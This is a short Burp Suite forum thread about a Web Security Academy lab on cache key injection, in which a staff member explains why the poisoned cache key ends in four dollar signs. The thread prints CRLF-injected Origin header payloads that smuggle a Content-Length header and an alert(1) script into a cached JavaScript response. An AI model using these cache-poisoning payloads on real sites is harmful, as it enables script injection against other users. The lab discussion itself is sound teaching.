Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: Cache key injection

Ariel | Last updated: Feb 03, 2021 08:48PM UTC

Hi want to know why on the JS page inside the origin header put 4 sign of dollar and not 2. GET /js/localize.js?lang=en?utm_content=z&cors=1&x=1 HTTP/1.1 Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$

Uthman, PortSwigger Agent | Last updated: Feb 04, 2021 04:45PM UTC

Hi Ariel, In this lab, the caching key has the following structure: 'path?query$$origin' When we poison the cache on the 'js/localize.js' page with the Origin header, the caching key becomes: '/js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$' After that, we poison the 'login?lang=en' so that it redirects to '/login/?lang=enx?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23' and '/js/localize.js' script is fetched with the same query. When the script is fetched after the redirection, since it is a same origin request, the origin header will be empty. So the actual key will be the redirection query + '$$' + (blank orgin) So the key will be the same: '/js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$' Hence we receive the poisoned response.

Ariel | Last updated: Feb 07, 2021 01:27PM UTC

thanks , it's help

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.